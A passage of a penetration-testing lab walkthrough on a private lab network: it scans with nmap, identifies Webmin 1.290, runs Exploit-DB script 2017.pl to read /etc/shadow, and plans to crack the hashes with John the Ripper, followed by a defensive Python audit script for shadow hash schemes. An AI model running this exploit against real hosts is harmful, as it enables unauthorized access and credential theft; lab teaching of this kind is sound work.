1. Scan with nmap to probe for open ports.
#nmap -sV 192.168.56.0/24
Using port 10000:
192.168.56.102:10000
Based on the picture, we know that they use the Webmin application.
3. Open Nessus to see what application they use and its vulnerabilities.
Based on the picture, we know that they are using Webmin version 1.290 or lower.
4. Search for the vulnerabilities in Exploit-DB.
#cd /pentest/exploits/exploitdb
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
5. Type this to see how to use it.
root@bt:/pentest/exploits/exploitdb# cat platforms/multiple/remote/2017.pl
6. Type this to see the username and password.
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.56.102 10000 /etc/shadow 0
But the password is still encrypted.
To crack the password I will use John the Ripper.
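
How long the /etc/shadow entries from step 6 hold up against an offline cracker depends on the hash scheme of each entry. The script below is an added example, not part of the original post, that classifies every entry so an administrator can find accounts still on weak schemes; SAMPLE_SHADOW is constructed data and the function names are hypothetical.

```python
# Added example: classify the hash scheme of each /etc/shadow entry.
# SAMPLE_SHADOW is constructed data, not output from the lab target.
SAMPLE_SHADOW = """\
root:$1$constructed$abcdefghijklmnopqrstuv:13000:0:99999:7:::
alice:$6$constructedsalt$AAAABBBBCCCCDDDD:19000:0:99999:7:::
bob:abJnggxhB/yWI:13000:0:99999:7:::
daemon:*:13000:0:99999:7:::
carol::13000:0:99999:7:::
dave:!$6$constructedsalt$AAAABBBBCCCCDDDD:19000:0:99999:7:::
"""

# crypt(3) modular-format identifiers -> (scheme name, acceptable today?)
SCHEMES = {
    "1": ("md5crypt", False),
    "2a": ("bcrypt", True), "2b": ("bcrypt", True), "2y": ("bcrypt", True),
    "5": ("sha256crypt", True),
    "6": ("sha512crypt", True),
    "y": ("yescrypt", True),
}

def classify(field):
    """Return (scheme, finding) for the password field of a shadow line."""
    if field == "":
        return ("none", "EMPTY PASSWORD")      # login without a password
    if field.startswith(("!", "*")):
        rest = field.lstrip("!*")
        if not rest:
            return ("locked", "ok")            # no usable hash stored
        return (classify(rest)[0], "locked")   # hash kept, login disabled
    if field.startswith("$"):
        parts = field.split("$")
        ident = parts[1] if len(parts) > 2 else ""
        if ident not in SCHEMES:
            return ("unknown", "REVIEW")
        name, strong = SCHEMES[ident]
        return (name, "ok" if strong else "WEAK")
    if len(field) == 13:
        return ("descrypt", "WEAK")            # traditional DES crypt
    return ("unknown", "REVIEW")

def audit(text):
    """Map each user name to its (scheme, finding) pair."""
    results = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and not line.startswith("#"):
            results[fields[0]] = classify(fields[1])
    return results

if __name__ == "__main__":
    for user, (scheme, finding) in audit(SAMPLE_SHADOW).items():
        print(f"{user:8} {scheme:12} {finding}")
```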